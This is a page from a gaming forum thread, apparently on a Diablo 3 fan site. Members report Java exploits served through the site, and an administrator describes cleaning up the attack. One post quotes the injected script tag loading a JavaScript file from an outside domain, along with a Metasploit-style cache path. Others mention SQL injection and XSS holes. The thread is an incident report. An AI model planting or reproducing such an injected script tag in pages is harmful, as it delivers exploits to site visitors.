Latest Diablo 3 News
DiabloWiki Updates
Page 3 of 3 FirstFirst 123
Results 21 to 28 of 28

Thread: Java Plug-in

  1. #21
    Diablo 3 Beta Tester TheFarxy's Avatar
    Join Date
    Oct 2011
    Location
    norway
    BattleTag Farxy-2729
    Posts
    156

    0 Not allowed!

    Re: Java exploits on the site?

    nasty one this



  2. #22
    Diablo 3 Beta Tester Loriku's Avatar
    Join Date
    Mar 2008
    Location
    UK
    BattleTag Zoe-2982
    Posts
    353

    0 Not allowed!

    Re: Java exploits on the site?

    Submit your attacks for analysis!



  3. #23
    IncGamers Site Pal Kitteh's Avatar
    Join Date
    Mar 2011
    Location
    The SPF
    Posts
    7,695

    0 Not allowed!

    Re: Java exploits on the site?

    Ah ****........


    Soft Kitteh, warm Kitteh, little ball of furrrrrrrrrrrr
    Happy Kitteh, sleepy Kitteh, pur pur purrrrrrrrrrrr

    Redemptio - The Road to Redemption [99 Thread and Diary]

  4. #24
    IncGamers Site Pal
    Diablo 3 Beta Tester
    Bowzer's Avatar
    Join Date
    Oct 2011
    Location
    Soviet Canuckistan
    BattleTag Bowzer -1925
    Posts
    1,937

    0 Not allowed!

    Re: Java Plug-in<script src=http://www.betheboss.it/ads/link.js></script>

    file:C:\Users\****\AppData\Local\Temp\jar_cache827 878788570227754.tmp->msf/x/Help.class

    It's loading new files now.

    Aieeeeeeeeeeee.



  5. #25
    Diablo: IncGamers Member
    Join Date
    Aug 2011
    Location
    NZ
    Posts
    359

    0 Not allowed!

    Re: Java exploits on the site?

    FYI the script tag is attempting to insert itself into the title of posts when I hit reply to a post in a lot of threads. Although not in this one ironically enough. And to head off the immediate "it all you" posts it's not happening client side.



  6. #26
    Administrator Rushster's Avatar
    Join Date
    Jun 2003
    BattleTag Ruhster1234
    Posts
    723

    0 Not allowed!

    Re: Java Plug-in

    Right, we have sorted this latest attack out so all pages are clean. They are determined to say the least. However we are making further changes now to put a stop to this which is really inconvenient for everyone. We are doing our very best to deal with these attacks and we are watching it it 24/7. If anyone spots anything before we do, I urge you to send an email to paul@incgamers.com, not just a PM.



    Rushster - Admin,
    IncGamers.com





  7. #27
    IncGamers Site Pal
    Diablo 3 Beta Tester
    Bowzer's Avatar
    Join Date
    Oct 2011
    Location
    Soviet Canuckistan
    BattleTag Bowzer -1925
    Posts
    1,937

    0 Not allowed!

    Re: Java Plug-in

    Did you get the possible SQL injection method page I had sent you on IRC?

    There are several XSS vulnerabilities related to the way the URL button works in the wysiwyg editor as well.



  8. #28
    Administrator Rushster's Avatar
    Join Date
    Jun 2003
    BattleTag Ruhster1234
    Posts
    723

    0 Not allowed!

    Re: Java Plug-in

    Bowzer, those XSS vulnerabilities should be patched in the latest Vbulltion (which this is) I didn't see any other methods you sent. Can you drop me a PM to make sure I have not missed anything you haven't?



    Rushster - Admin,
    IncGamers.com





Page 3 of 3 FirstFirst 123

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •